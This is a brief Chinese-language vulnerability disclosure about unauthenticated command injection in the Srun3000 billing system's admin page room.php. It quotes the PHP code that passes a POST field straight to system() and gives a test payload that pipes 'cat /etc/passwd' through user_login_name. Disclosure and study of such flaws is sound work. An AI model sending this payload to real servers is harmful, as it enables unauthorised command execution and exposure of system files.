Srun3000计费系统命令执行漏洞
/srun3/srun/web/admin/flux_stat/room.php
<?php
header("Content-type:text/html;charset=gb2312");
require("ipt_authd_conn.php");
require("../functions/functions.php");
$debug=1;
switch($_POST["action"])//
{
case "checkout":
$user_login_name=$_POST["user_login_name"];
$group_id=$_POST["user_group_id"];
if($_POST["status"]==1)
{
system("super dropuser ".$user_login_name);//命令执行~
}这个是用户页面里面的管理页面
不需要登录 没有验证权限
测试方法 x.com/admin/flux_room.php
POST action=checkout&user_login_name=1|cat /etc/passwd